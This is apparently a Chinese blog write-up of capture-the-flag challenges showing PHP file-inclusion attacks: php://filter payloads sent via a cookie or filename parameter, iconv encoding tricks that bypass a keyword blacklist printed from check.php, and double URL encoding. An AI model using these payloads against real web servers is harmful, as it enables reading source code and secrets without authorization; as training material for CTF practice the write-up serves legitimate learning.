攻防世界-php伪协议和文件包含

fileinclude

可以看到正常回显里面显示lan参数有cookie值表示为language

然后进行一个判断,如果参数不是等于英语,就加上.php,那我们就可以在前面进行注入一个参数,即flag,

payload:COOKIE:language=flag

发现还是无回显到flag.php里

可能存在的文件读取限制或过滤机制

利用 php://filter 和 language Cookie 组合,通过指定convert.base64 - encode,可以将读取到的文件内容进行 Base64 编码

Payload:Cookie: language=php://filter/convert.base64-encode/resource=flag

缘由:因为服务器可能只检查直接的文件路径访问,而没有考虑到经过编码转换的情况。

得到回显值为PD9waHANCiRmbGFnPSJjeWJlcnBlYWNlezhmYzdhY2U0MzE0OTg3Mjk0ZWZiMTFmMDM4ZDM0MTM3fSI7DQo/Pg==

解码可得

file_include

<?php highlight_file(FILE); include("./check.php"); if(isset(_GET\['filename'\])){ filename = _GET\['filename'\]; include(filename); } ?>

当使用 convert.iconv.UTF - 8.UCS - 2 过滤器时,文件内容的编码被改变,原本在 UTF - 8 编码下能被识别的危险字符或模式,在 UCS - 2 编码下可能就无法被识别,从而绕过了服务器的过滤机制。

Payload:?filename=php://filter/convert.iconv.UTF-8.UCS-2/resource=flag.php

check.php的内容为:
<?php if(_GET\["filename"\]){ preg_match_username = 'return preg_match("/base|be|encode|print|zlib|quoted|write|rot13|read|string/i", _GET\["filename"\]);'; if (eval(preg_match_username)) { die("do not hack!"); } } ## 题目名称-文件包含 通过一开始的测试,我们可以发现显示我们有正常的过滤器,但是参数不对,那我们就开始进行模糊测试,对常见字符进行编码转换,发现还是不对,再对编码格式进行测试,先去搜索php支持的编码格式字典 放到爆破里去进行爆破,解出 ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/b03822c711ea4ad5a03b820452528d6d.png) ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/96c8fc1564f5467c9979c23475c08e6c.png) ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/1f1a36dfb262403d9018e246ac3aeee7.png) Payload:?filename=php://filter/convert.iconv.BIG-5*.UCS-4*/resource=flag.php 解出该flag ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/7c57418836f64f1290b63ccf9b5b690d.png) ## PHP2 参考网上大佬的资料发现,这里要用到index.phps来查看php的源代码(没用的只是又增加了) ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/b306fd01b6b3457a8b39a89e79785b3f.png) 代码审计发现他要求id=admin的编码,所以我们进行编码后发现还是显示错误,后面发现经过一次编码,浏览器会自动进行一次解码环节,所以我们要进行二次编码才可以,得出flag ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/d00c4ed2f274437cb8fe8be289c761ee.png)

相关推荐
0110_102414 分钟前
tauri + rust的环境搭建---初始化以及构建
开发语言·后端·rust
会开花的二叉树15 分钟前
C++微服务 UserServer 设计与实现
开发语言·c++·微服务
像风一样自由202019 分钟前
Rust Tokio vs Go net/http:云原生与嵌入式生态选型指南
开发语言·golang·rust
DuHz21 分钟前
C程序中的数组与指针共生关系
linux·c语言·开发语言·嵌入式硬件·算法
我星期八休息24 分钟前
C++智能指针全面解析:原理、使用场景与最佳实践
java·大数据·开发语言·jvm·c++·人工智能·python
大猫会长29 分钟前
docker安装php+apache
java·开发语言
道之极万物灭43 分钟前
Go小工具合集
开发语言·后端·golang
梵得儿SHI1 小时前
Java 反射机制深度剖析:性能与安全性的那些坑
java·开发语言·安全·反射·动态代理·性能·反射机制
fsnine1 小时前
Python图形化界面——pyqt5教程
开发语言·python·qt
嵌入式-老费1 小时前
Easyx图形库应用(和lua结合使用)
开发语言·lua